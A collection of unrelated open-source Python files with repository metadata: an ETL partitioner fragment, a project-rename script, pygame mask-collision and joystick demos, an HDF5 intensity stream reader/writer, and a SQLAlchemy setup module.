if hasattr(self._obj, 'lookup'):
return self._enqueue('lookup', row, namemapping)
else:
raise AttributeError('The object does not support lookup')
def ensure(self, row, namemapping={}):
"""Invoke ensure on the decoupled FactTable in the separate process"""
if hasattr(self._obj, 'ensure'):
return self._enqueue('ensure', row, namemapping)
else:
raise AttributeError('The object does not support ensure')
#######
class BasePartitioner(object):
"""A base class for partitioning between several parts.
See also DimensionPartitioner and FactTablePartitioner.
"""
def __init__(self, parts):
self.parts = list(parts)
self.__nextpart = 0
def parts(self):
"""Return the parts the partitioner works on"""
return self.parts[:]
def addpart(self, part):
"""Add a part"""
self.parts.append(part)
def droppart(self, part=None):
"""Drop a part. If an argument is given, it must be a part of the
partitioner and it will then be removed. If no argument is given,
the first part is removed."""
if part is None:
self.parts.pop()
else:
self.parts.remove(part)
def getpart(self, row, namemapping={}):
"""Find the part that should handle the given row. The provided
implementation in BasePartitioner only uses round-robin
partitioning, but subclasses apply other methods """
part = self.parts[self.__nextpart]
self.__nextpart = (self.__nextpart + 1) % len(self.parts)
return part
def endload(self):
"""Call endload on all parts"""
for part in self.parts:
part.endload()
class DimensionPartitioner(BasePartitioner):
"""A Dimension-like class that handles partitioning.
Partitioning is done between a number of Dimension objects called the
parts. The class offers the interface of Dimensions (incl. scdensure
from SlowlyChangingDimension). When a method is called, the
corresponding method on one of the parts (chosen by a user-definable
partitioner function) will be invoked. The parts can operate on a
single physical dimension table or different physical tables.
"""
def __init__(self, parts, getbyvalsfromall=False, partitioner=None):
"""Arguments:
- parts: a sequence of Dimension objects.
- getbyvalsfromall: determines if getbyvals should be answered by
means of all parts (when getbyvalsfromall = True) or only the
first part, i.e., parts[0] (when getbyvalsfromall = False).
Default: False
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the lookupatts to the values of
the lookupatts. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the hash value of each value of the lookupatts
and adds them together.
"""
BasePartitioner.__init__(self, parts=parts)
self.getbyvalsfromall = getbyvalsfromall
self.lookupatts = parts[0].lookupatts
self.key = parts[0].key
for p in parts:
if not p.lookupatts == self.lookupatts:
raise ValueError('The parts must have the same lookupatts')
if not p.key == self.key:
raise ValueError('The parts must have the same key')
if partitioner is not None:
self.partitioner = partitioner
else:
# A partitioner that takes the hash of each attribute value in
# row and adds them all together:
# Reading from right to left: get the values, use hash() on each
# of them, and add all the hash values
self.partitioner = lambda row: reduce((lambda x, y: x + y),
map(hash, row.values()))
def getpart(self, row, namemapping={}):
"""Return the part that should handle the given row"""
vals = {}
for att in self.lookupatts:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
# Below this, methods like those in Dimensions:
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def __getbykeyhelper(self, keyvalue):
# Returns (rowresult, part). part is None if no result was found.
for part in self.parts:
row = part.getbykey(keyvalue)
if row[self.key] is not None:
return (row, part)
return (row, None)
def getbykey(self, keyvalue):
"""Invoke getbykey on the relevant Dimension part"""
return self.__getbykeyhelper(keyvalue)[0]
def getbyvals(self, values, namemapping={}):
"""Invoke getbyvals on the first part or all parts (depending on the
value of the instance's getbyvalsfromall)"""
if not self.getbyvalsfromall:
return self.parts[0].getbyvals(values, namemapping)
res = []
for part in self.parts:
res += part.getbyvals(values, namemapping)
return res
def update(self, row, namemapping={}):
"""Invoke update on the relevant Dimension part"""
keyval = row[namemapping.get(self.key) or self.key]
part = self.__getbykeyhelper(keyval)[1]
if part is not None:
part.update(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.insert(row, namemapping)
def scdensure(self, row, namemapping={}):
"""Invoke scdensure on the relevant Dimension part"""
part = self.getpart(row, namemapping)
return part.scdensure(row, namemapping)
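# --- Illustrative usage sketch (editor's addition, not part of pygrametl) ---
# A minimal sketch of partitioning lookups and inserts over two Dimension
# parts that here operate on the same physical table; all names are
# hypothetical.
def _example_dimensionpartitioner_usage():
    part1 = CachedDimension(name='book', key='bookid',
                            attributes=['title', 'genre'],
                            lookupatts=['title'])
    part2 = CachedDimension(name='book', key='bookid',
                            attributes=['title', 'genre'],
                            lookupatts=['title'])
    dim = DimensionPartitioner([part1, part2])
    # The default partitioner hashes the lookupatt values to pick the part
    # that handles a given row.
    dim.ensure({'title': 'Unknown', 'genre': 'Unknown'})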
class FactTablePartitioner(BasePartitioner):
"""A FactTable-like class that handles partitioning.
Partitioning is done between a number of FactTable objects called the
parts. The class offers the interface of FactTable. When a method is
called, the corresponding method on one of the parts (chosen by a
user-definable partitioner function) will be invoked. The parts can
operate on a single physical fact table or different physical
tables.
"""
def __init__(self, parts, partitioner=None):
"""
Arguments:
- parts: a sequence of FactTable objects.
- partitioner: None or a callable p(dict) -> int where the argument
is a dict mapping from the names of the keyrefs to the values of
the keyrefs. The resulting int is used to determine which part
a given row should be handled by.
When partitioner is None, a default partitioner is used. This
partitioner computes the sum of all the keyrefs values.
"""
BasePartitioner.__init__(self, parts=parts)
if partitioner is not None:
self.partitioner = partitioner
else:
self.partitioner = lambda row: reduce((lambda x, y: x + y),
row.values())
self.all = parts[0].all
self.keyrefs = parts[0].keyrefs
self.measures = parts[0].measures
for ft in parts:
if not (self.keyrefs == ft.keyrefs and
self.measures == ft.measures):
raise ValueError(
'The parts must have the same measures and keyrefs')
def getpart(self, row, namemapping={}):
"""Return the relevant part for the given row """
vals = {}
for att in self.keyrefs:
vals[att] = row[namemapping.get(att) or att]
return self.parts[self.partitioner(vals) % len(self.parts)]
def insert(self, row, namemapping={}):
"""Invoke insert on the relevant part """
part = self.getpart(row, namemapping)
part.insert(row, namemapping)
def lookup(self, row, namemapping={}):
"""Invoke lookup on the relevant part """
part = self.getpart(row, namemapping)
return part.lookup(row, namemapping)
def ensure(self, row, namemapping={}):
"""Invoke ensure on the relevant part """
part = self.getpart(row, namemapping)
return part.ensure(row, namemapping)
|
bsd-2-clause
| -3,030,556,517,807,855,600
| 44.030871
| 104
| 0.586979
| false
| 4.564654
| false
| false
| false
|
amarchen/log4qt-demo-sailfish
|
rename-to-my-project.py
|
1
|
3857
|
'''
Created on 23.2.2014
@author: tace (samuli.silvius@gmail.com)
'''
import sys
import os
import argparse
from os import rename
SCRIPT_NAME = os.path.basename(__file__)
def convert_file_names(files, originalName, newName):
print "\n>>>> Convert file names\n"
for fname in files:
if fname.find(originalName) != -1:
newFullName = fname.replace(originalName, newName, 1)
rename(fname, newFullName)
print "Renamed file " + fname + " --> " + newFullName
else:
print "File's '" + fname + "' name does not need conversion!"
print ">>>> DONE converting filenames"
print "====================================================================\n"
def convert_files_content(files, originalText, newText):
print "\n>>>> Convert files content\n"
for file in files:
newlines = []
with open(file, 'r') as f:
found = False
for i, line in enumerate(f, 1):
if line.find(originalText) != -1:
print "Converting text in file '" + file + "' at line " + str(i)
found = True
newlines.append(line.replace(originalText, newText))
if not found:
print "File " + file + " don't need editing."
with open(file, 'w') as f:
for line in newlines:
f.write(line)
print ">>>> DONE converting files content"
print "====================================================================\n"
def get_files(path,
ignored_dirs=['.git'],
ignored_files=[SCRIPT_NAME],
ignore_binary_files=False):
for prefix, dirs, files in os.walk(path):
for ignore in ignored_dirs:
if ignore in dirs:
dirs.remove(ignore)
print "Ignored dir: " + ignore
for name in files:
ignored = False
for ignore in ignored_files:
if ignore in name:
files.remove(ignore)
ignored = True
print "Ignored file: " + ignore
if not ignored:
filename = os.path.join(prefix, name)
if ignore_binary_files and is_binary(filename):
print filename + " is BINARY file and ignored by default!"
else:
yield filename
def is_binary(filename):
"""
Return true if the given filename appears to be binary.
File is considered to be binary if it contains a NULL byte.
FIXME: This approach incorrectly reports UTF-16 as binary.
"""
with open(filename, 'rb') as f:
for block in f:
if '\0' in block:
return True
return False
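# --- Illustrative sketch (editor's addition) ---
# Quick check of the NULL-byte heuristic above on two hypothetical files; the
# temporary paths are assumptions made for illustration only.
def _example_is_binary_check():
    with open('/tmp/sample.txt', 'wb') as f:
        f.write('plain text\n')
    with open('/tmp/sample.bin', 'wb') as f:
        f.write('\x00\x01\x02')
    print is_binary('/tmp/sample.txt'), is_binary('/tmp/sample.bin')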
def check_args(args):
if not args.newName.startswith('harbour-'):
print "Your new app name MUST start with \"harbour-\""
sys.exit()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('newName', help='New name of your program')
parser.add_argument('--originalName', nargs='?', default='harbour-helloworld-pro-sailfish', help="Default is '%(default)s'")
parser.add_argument('--ignoredDirs', nargs='*', default=['.git'], help="Give a list of dir paths separated with space. Default is '%(default)s'")
parser.add_argument('--ignoredFiles', nargs='*', default=[SCRIPT_NAME], help="Give a list of file paths separated with space. Default is '%(default)s'")
args = parser.parse_args()
check_args(args)
files = get_files(".", args.ignoredDirs, args.ignoredFiles)
convert_file_names(files, args.originalName, args.newName)
files = get_files(".", args.ignoredDirs, args.ignoredFiles, ignore_binary_files=True)
convert_files_content(files, args.originalName, args.newName)
if __name__ == '__main__':
main()
|
unlicense
| 760,484,320,337,282,400
| 37.188119
| 156
| 0.56028
| false
| 4.183297
| false
| false
| false
|
mark-me/Pi-Jukebox
|
venv/Lib/site-packages/pygame/examples/mask.py
|
1
|
5555
|
#!/usr/bin/env python
"""A pgyame.mask collition detection example
exports main()
This module can also be run as a stand-alone program, accepting
one or more image file names as command line arguments.
"""
import sys, random
import pygame, pygame.image, pygame.surface, pygame.time, pygame.display
def maskFromSurface(surface, threshold = 127):
#return pygame.mask.from_surface(surface, threshold)
mask = pygame.mask.Mask(surface.get_size())
key = surface.get_colorkey()
if key:
for y in range(surface.get_height()):
for x in range(surface.get_width()):
if surface.get_at((x,y)) != key:
mask.set_at((x,y),1)
else:
for y in range(surface.get_height()):
for x in range (surface.get_width()):
if surface.get_at((x,y))[3] > threshold:
mask.set_at((x,y),1)
return mask
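# --- Illustrative sketch (editor's addition) ---
# Tiny demonstration of the colorkey path of maskFromSurface above on a
# hypothetical 4x4 surface; every non-colorkey pixel ends up set in the mask.
def _example_mask_from_colorkey_surface():
    surf = pygame.Surface((4, 4))
    surf.fill((255, 0, 0))
    surf.set_colorkey((0, 0, 0))
    mask = maskFromSurface(surf)
    print (mask.count())  # 16: all pixels differ from the colorkey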
def vadd(x,y):
return [x[0]+y[0],x[1]+y[1]]
def vsub(x,y):
return [x[0]-y[0],x[1]-y[1]]
def vdot(x,y):
return x[0]*y[0]+x[1]*y[1]
class Sprite:
def __init__(self, surface, mask = None):
self.surface = surface
if mask:
self.mask = mask
else:
self.mask = maskFromSurface(self.surface)
self.setPos([0,0])
self.setVelocity([0,0])
def setPos(self,pos):
self.pos = [pos[0],pos[1]]
def setVelocity(self,vel):
self.vel = [vel[0],vel[1]]
def move(self,dr):
self.pos = vadd(self.pos,dr)
def kick(self,impulse):
self.vel[0] += impulse[0]
self.vel[1] += impulse[1]
def collide(self,s):
"""Test if the sprites are colliding and
resolve the collision in this case."""
offset = [int(x) for x in vsub(s.pos,self.pos)]
overlap = self.mask.overlap_area(s.mask,offset)
if overlap == 0:
return
"""Calculate collision normal"""
nx = (self.mask.overlap_area(s.mask,(offset[0]+1,offset[1])) -
self.mask.overlap_area(s.mask,(offset[0]-1,offset[1])))
ny = (self.mask.overlap_area(s.mask,(offset[0],offset[1]+1)) -
self.mask.overlap_area(s.mask,(offset[0],offset[1]-1)))
if nx == 0 and ny == 0:
"""One sprite is inside another"""
return
n = [nx,ny]
dv = vsub(s.vel,self.vel)
J = vdot(dv,n)/(2*vdot(n,n))
if J > 0:
"""Can scale up to 2*J here to get bouncy collisions"""
J *= 1.9
self.kick([nx*J,ny*J])
s.kick([-J*nx,-J*ny])
return
"""Separate the sprites"""
c1 = -overlap/vdot(n,n)
c2 = -c1/2
self.move([c2*nx,c2*ny])
s.move([(c1+c2)*nx,(c1+c2)*ny])
def update(self,dt):
self.pos[0] += dt*self.vel[0]
self.pos[1] += dt*self.vel[1]
def main(*args):
"""Display multiple images bounce off each other using collition detection
Positional arguments:
one or more image file names.
This pygame.mask demo will display multiple moving sprites bouncing
off each other. More than one sprite image can be provided.
"""
if len(args) == 0:
raise ValueError("Require at least one image file name: non given")
print ('Press any key to quit')
screen = pygame.display.set_mode((640,480))
images = []
masks = []
for impath in args:
images.append(pygame.image.load(impath).convert_alpha())
masks.append(maskFromSurface(images[-1]))
numtimes = 10
import time
t1 = time.time()
for x in range(numtimes):
m = maskFromSurface(images[-1])
t2 = time.time()
print ("python maskFromSurface :%s" % (t2-t1))
t1 = time.time()
for x in range(numtimes):
m = pygame.mask.from_surface(images[-1])
t2 = time.time()
print ("C pygame.mask.from_surface :%s" % (t2-t1))
sprites = []
for i in range(20):
j = i % len(images)
s = Sprite(images[j],masks[j])
s.setPos((random.uniform(0,screen.get_width()),
random.uniform(0,screen.get_height())))
s.setVelocity((random.uniform(-5,5),random.uniform(-5,5)))
sprites.append(s)
pygame.time.set_timer(pygame.USEREVENT,33)
while 1:
event = pygame.event.wait()
if event.type == pygame.QUIT:
return
elif event.type == pygame.USEREVENT:
"""Do both mechanics and screen update"""
screen.fill((240,220,100))
for i in range(len(sprites)):
for j in range(i+1,len(sprites)):
sprites[i].collide(sprites[j])
for s in sprites:
s.update(1)
if s.pos[0] < -s.surface.get_width()-3:
s.pos[0] = screen.get_width()
elif s.pos[0] > screen.get_width()+3:
s.pos[0] = -s.surface.get_width()
if s.pos[1] < -s.surface.get_height()-3:
s.pos[1] = screen.get_height()
elif s.pos[1] > screen.get_height()+3:
s.pos[1] = -s.surface.get_height()
screen.blit(s.surface,s.pos)
pygame.display.update()
elif event.type == pygame.KEYDOWN:
return
if __name__ == '__main__':
if len(sys.argv) < 2:
print ('Usage: mask.py <IMAGE> [<IMAGE> ...]')
print ('Let many copies of IMAGE(s) bounce against each other')
print ('Press any key to quit')
else:
main(*sys.argv[1:])
|
agpl-3.0
| 1,926,169,614,142,610,700
| 30.5625
| 78
| 0.540954
| false
| 3.340349
| false
| false
| false
|
CHIMEFRB/ch_frb_io
|
ch_frb_io/stream.py
|
1
|
13853
|
"""
IO for intensity data.
"""
import os
from os import path
import warnings
import logging
import glob
import numpy as np
import h5py
import bitshuffle.h5 as bshufh5
logger = logging.getLogger(__name__)
# Default chunk and file size.
CHUNKS = (64, 2, 256)
NTIME_PER_FILE = CHUNKS[2] * 64
# Dataset definitions.
DATASETS = {
# 'time' is a special axis-defining dataset. Must have units of seconds since
# it is used for filenames.
'index_map/time' : {
'dtype' : np.float64,
'chunks' : (CHUNKS[2],),
},
'intensity' : {
'dtype' : np.float32,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
'weight' : {
'dtype' : np.uint8,
'axis' : ['freq', 'pol', 'time'],
'chunks' : CHUNKS,
'compression' : bshufh5.H5FILTER,
'compression_opts' : (0, bshufh5.H5_COMPRESS_LZ4),
},
}
class StreamWriter(object):
def __init__(self, outdir='', freq=None, pol=None, attrs=None):
# Default values for freq and pol.
if freq is None:
from ch_L1mock import constants
freq = (constants.FPGA_FREQ0 + np.arange(constants.FPGA_NFREQ)
* constants.FPGA_DELTA_FREQ)
if pol is None:
pol = ['XX', 'YY']
self._outdir = outdir
self._freq = freq
self._nfreq = len(freq)
self._pol = pol
self._npol = len(pol)
if attrs is None:
attrs = {}
self._attrs = attrs
# For now these are statically defined.
self._ntime_per_file = NTIME_PER_FILE
self._ntime_block = CHUNKS[2]
self._datasets = dict(DATASETS)
assert self._ntime_per_file % self.ntime_block == 0
# Initialize dataset buffers.
self._buffers = {}
datasets = dict(self._datasets)
time_info = datasets.pop('index_map/time')
self._buffers['index_map/time'] = np.empty(self.ntime_block,
dtype=time_info['dtype'])
for name, info in datasets.items():
if info['axis'] != ['freq', 'pol', 'time']:
msg = "Only ('freq', 'pol', 'time') datasets supported."
raise NotImplementedError(msg)
self._buffers[name] = np.empty(
(self._nfreq, self._npol, self.ntime_block),
dtype = info['dtype']
)
if self.ntime_block % info['chunks'][2]:
msg = "Integer number of chunks must fit into buffer."
raise ValueError(msg)
# TODO Check sanity of other chunk dimensions.
# Buffers initially empty.
self._ntime_buffer = 0
# Initialize output.
self._file = None
self._t0 = None # Offset for file names.
if not path.isdir(outdir):
os.mkdir(outdir)
# Ensure that warnings only issued once.
self._alignment_warned = False
def __del__(self):
self.finalize()
@property
def ntime_block(self):
"""Target write size. The size of the buffer when full."""
return self._ntime_block
@property
def ntime_buffer(self):
"""Current number of times currently in the buffer."""
return self._ntime_buffer
@property
def ntime_current_file(self):
"""Number of times in current file."""
if self._file is None:
return 0
else:
return len(self._file['index_map/time'])
@property
def ntime_per_file(self):
return self._ntime_per_file
def absorb_chunk(self, **kwargs):
"""
"""
time = kwargs.pop('time')
ntime = len(time)
for name, data in kwargs.items():
if data.shape != (self._nfreq, self._npol, ntime):
msg = "Inconsistent dimensions for dataset %s" % name
raise ValueError(msg)
kwargs['index_map/time'] = time
assert set(kwargs.keys()) == set(DATASETS.keys())
ntime_consumed = 0
while ntime_consumed < ntime:
ntime_remaining = ntime - ntime_consumed
if self.ntime_buffer == 0 and ntime_remaining >= self.ntime_block:
# If the buffers are empty and ntime is bigger than the buffer
# size, do a direct write.
to_write = (ntime_remaining
- (ntime_remaining % self.ntime_block))
to_write = min(to_write,
self._ntime_per_file - self.ntime_current_file)
self._append_data_disk(
ntime_consumed,
ntime_consumed + to_write,
**kwargs
)
ntime_consumed = ntime_consumed + to_write
else:
# Add data to buffers.
to_buffer = min(self.ntime_block - self.ntime_buffer,
ntime_remaining)
self._append_data_buffers(
ntime_consumed,
ntime_consumed + to_buffer,
**kwargs
)
ntime_consumed = ntime_consumed + to_buffer
def flush(self):
if (self.ntime_buffer != self.ntime_block
and not self._alignment_warned):
msg = ("Flushing buffers that are not full. Expect alignment"
" issues and performance degradation.")
logger.warning(msg)
self._alignment_warned = True
self._append_data_disk(0, self.ntime_buffer, **self._buffers)
self._ntime_buffer = 0
def finalize(self):
# Do nothing if this has already been called.
if hasattr(self, '_datasets'):
# Suppress warning if the buffers aren't full.
self._alignment_warned = True
self.flush()
if self._file:
self._file.close()
# The following does two things: releases memory which is nice, but
# more importantly invalidates the instance.
del self._buffers
del self._datasets
def _initialize_file(self, first_time):
# Files are named with their starting time relative to beginning of
# acquisition.
if self._t0 is None:
self._t0 = first_time
first_time -= self._t0
fname = '%08d.h5' % int(round(first_time))
fname = path.join(self._outdir, fname)
# Open file and write non-time-dependant datasets.
f = h5py.File(fname, mode='w')
for name, value in self._attrs.items():
f.attrs[name] = value
# Index map
im = f.create_group('index_map')
im.create_dataset('pol', data=self._pol)
im.create_dataset('freq', data=self._freq)
# Initialize time dependant datasets.
datasets = dict(self._datasets)
time_dset_info = datasets.pop('index_map/time')
f.create_dataset(
'index_map/time',
shape=(0,),
maxshape=(None,),
dtype=time_dset_info['dtype'],
chunks=time_dset_info['chunks'],
)
for dset_name, dset_info in datasets.items():
compression = dset_info.get('compression', None)
compression_opts = dset_info.get('compression_opts', None)
dset = f.create_dataset(
dset_name,
shape=(self._nfreq, self._npol, 0),
maxshape=(self._nfreq, self._npol, None),
dtype=dset_info['dtype'],
chunks=dset_info['chunks'],
compression=compression,
compression_opts=compression_opts,
)
dset.attrs['axis'] = dset_info['axis']
self._file = f
def _append_data_disk(self, start, stop, **kwargs):
if self._file is None:
first_time = kwargs['index_map/time'][start]
self._initialize_file(first_time)
ntime_disk = self.ntime_current_file
ntime = stop - start
time = kwargs.pop('index_map/time')
self._file['index_map/time'].resize((ntime_disk + ntime,))
self._file['index_map/time'][ntime_disk:] = time[start:stop]
for name, data in kwargs.items():
dset = self._file[name]
dset.resize((self._nfreq, self._npol, ntime_disk + ntime))
dset[...,ntime_disk:] = data[...,start:stop]
if ntime_disk + ntime >= self._ntime_per_file:
self._file.close()
self._file = None
def _append_data_buffers(self, start, stop, **kwargs):
ntime = stop - start
for name, data in kwargs.items():
buf = self._buffers[name]
buf_sl = np.s_[...,self.ntime_buffer:self.ntime_buffer + ntime]
buf[buf_sl] = data[...,start:stop]
self._ntime_buffer += ntime
if self.ntime_buffer == self.ntime_block:
self.flush()
class StreamReader(object):
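    """Read back an acquisition written by the writer class above.

    Scans *datadir* for the sorted ``########.h5`` files and yields their
    contents in HDF5-chunk-aligned blocks via ``yield_chunk``.
    """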
def __init__(self, datadir):
filenames = glob.glob(path.join(datadir, ("[0-9]" * 8 + '.h5')))
filenames.sort()
self._filenames = filenames
first_file = h5py.File(filenames[0], mode='r')
        # Copy the attributes into a plain dict before the file is closed below.
        self._attrs = dict(first_file.attrs)
self._freq = first_file['index_map/freq'][:]
self._pol = first_file['index_map/pol'][:]
time_arrs = []
for fname in filenames:
f = h5py.File(fname, mode='r')
time_arrs.append(f['index_map/time'][:])
f.close()
self._ntimes = [len(t) for t in time_arrs]
self._time = np.concatenate(time_arrs)
datasets = dict(DATASETS)
del datasets['index_map/time']
        for k in list(datasets.keys()):
if k not in first_file:
del datasets[k]
self._datasets = datasets
self._current_time_ind = 0
self._time_chunk = CHUNKS[2]
# The following no longer a constraint.
#for nt in self._ntimes[:-1]:
# if nt % self._time_chunk:
# raise ValueError("Files don't have integer number of chunks.")
self._h5_cache_start_ind = None
first_file.close()
@property
def attrs(self):
return dict(self._attrs)
@property
def filenames(self):
return list(self._filenames)
@property
def freq(self):
return self._freq.copy()
@property
def pol(self):
return self._pol.copy()
@property
def time(self):
return self._time.copy()
@property
def current_time_ind(self):
return self._current_time_ind
@property
def ntime_block(self):
"""Target read size."""
def finalize(self):
pass
#[f.close() for f in self._files]
def __del__(self):
self.finalize()
def yield_chunk(self, ntime=None):
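        """Return the next chunk of data as a dict keyed by dataset name.

        Reads *ntime* time samples (by default one HDF5 chunk) starting at
        the current position; raises StopIteration when no data remain.
        """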
start_time_ind = self.current_time_ind
ntime_remaining = len(self.time) - start_time_ind
if ntime is None:
            ntime = min(self._time_chunk, ntime_remaining)
if ntime > ntime_remaining or ntime == 0:
raise StopIteration()
out = {}
out['time'] = self.time[start_time_ind:start_time_ind + ntime]
        dataset_names = list(self._datasets.keys())
for dataset_name in dataset_names:
out[dataset_name] = []
while self.current_time_ind < start_time_ind + ntime:
# Ensure 'current_time_ind' is in the cache.
self._cache_h5_chunk()
# Determine where in the cache current_time_ind is.
h5_cache_ind = self.current_time_ind - self._h5_cache_start_ind
h5_cache_size = self._h5_cache[dataset_names[0]].shape[-1]
# How much data to copy from the current cache.
ntime_this_cache = min(
# Either the whole cache...
h5_cache_size - h5_cache_ind,
# ... or the rest of the data needed for this chunk.
start_time_ind + ntime - self.current_time_ind,
)
h5_cache_slice = np.s_[h5_cache_ind:
h5_cache_ind + ntime_this_cache]
for dataset_name in dataset_names:
out[dataset_name].append(
self._h5_cache[dataset_name][...,h5_cache_slice])
self._current_time_ind += ntime_this_cache
# Concatenate all the h5 chunks together to form an output chunk.
for dataset_name in dataset_names:
out[dataset_name] = np.concatenate(out[dataset_name], -1)
return out
def _cache_h5_chunk(self):
file_time_ind = self.current_time_ind
file_ntimes = list(self._ntimes)
which_file = 0
while file_time_ind >= file_ntimes[which_file]:
file_time_ind -= file_ntimes[which_file]
which_file += 1
# Get the hdf5 chunk that contains the index.
file_time_ind = (int(file_time_ind // self._time_chunk)
* self._time_chunk)
h5_cache_start_ind = (np.sum(file_ntimes[:which_file], dtype=int)
+ file_time_ind)
if self._h5_cache_start_ind == h5_cache_start_ind:
return
self._h5_cache_start_ind = h5_cache_start_ind
f = h5py.File(self._filenames[which_file], mode='r')
self._h5_cache = {}
for dataset_name in self._datasets.keys():
dataset = f[dataset_name]
self._h5_cache[dataset_name] = dataset[...,
file_time_ind:file_time_ind + self._time_chunk]
f.close()
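

# Minimal usage sketch, assuming an acquisition directory already written by
# the writer class above; 'acq_data' is only a placeholder name.
if __name__ == '__main__':
    import sys
    datadir = sys.argv[1] if len(sys.argv) > 1 else 'acq_data'
    reader = StreamReader(datadir)
    print('%d freq channels, %d polarisations, %d time samples'
          % (len(reader.freq), len(reader.pol), len(reader.time)))
    try:
        while True:
            # With no argument, yield_chunk() reads one HDF5-chunk-sized
            # block and raises StopIteration once the data are exhausted.
            chunk = reader.yield_chunk()
            print('read chunk with %d time samples' % len(chunk['time']))
    except StopIteration:
        pass
    finally:
        reader.finalize()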
|
mit
| 5,522,448,106,118,149,000
| 32.953431
| 79
| 0.532664
| false
| 3.8577
| false
| false
| false
|
martinohanlon/initio
|
pygametest.py
|
1
|
1057
|
import pygame
from pygame.locals import *
import os, sys
# set SDL to use the dummy NULL video driver,
# so it doesn't need a windowing system.
os.environ["SDL_VIDEODRIVER"] = "dummy"
# init pygame
pygame.init()
# create a 1x1 pixel screen, its not used
screen = pygame.display.set_mode((1, 1))
# init the joystick control
pygame.joystick.init()
# how many joysticks are there
print pygame.joystick.get_count()
# get the first joystick
joy = pygame.joystick.Joystick(0)
# init that joystick
joy.init()
running = True
while(running):
for event in pygame.event.get():
#thumb sticks, trigger buttons
if event.type == JOYAXISMOTION:
print event.value, event.axis
#d pad
elif event.type == JOYHATMOTION:
print event.value
#button pressed
elif event.type == JOYBUTTONDOWN:
print event.button
#button released
elif event.type == JOYBUTTONUP:
print event.button
|
mit
| -8,737,356,488,751,904,000
| 20.978261
| 46
| 0.613056
| false
| 3.535117
| false
| false
| false
|
mark-burnett/code-scientist
|
code_scientist/database/__init__.py
|
1
|
1655
|
# Copyright (C) 2012 Mark Burnett, David Morton
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sqlalchemy as _sa
import sqlalchemy.orm as _orm
import logging as _logging
import base as _base
import tables as _tables
from function import Function
from file import File
from file_set import FileSet
from snapshot import Snapshot
from repository import Repository
from tag import Tag
from metric import Metric
from metric_value import FunctionMetricValue, FileMetricValue
from metric_value import FileSetMetricValue, SnapshotMetricValue
def initialize(engine_string='sqlite://'):
_logging.debug('Creating SQLAlchemy engine for string: %s', engine_string)
engine = _sa.create_engine(engine_string)
_logging.debug('Creating tables.')
_base.Base.metadata.create_all(engine)
_base.Base.metadata.bind = engine
_logging.debug('Creating Session class.')
global Session
global UnscopedSession
UnscopedSession = _orm.sessionmaker(bind=engine)
Session = _orm.scoped_session(UnscopedSession)
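

# Minimal usage sketch, assuming an in-memory SQLite database; the query on
# Metric is illustrative only.
if __name__ == '__main__':
    initialize('sqlite://')
    session = Session()
    print(session.query(Metric).count())
    session.close()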
|
gpl-3.0
| -3,192,524,026,105,203,000
| 34.212766
| 78
| 0.753474
| false
| 4.036585
| false
| false
| false
|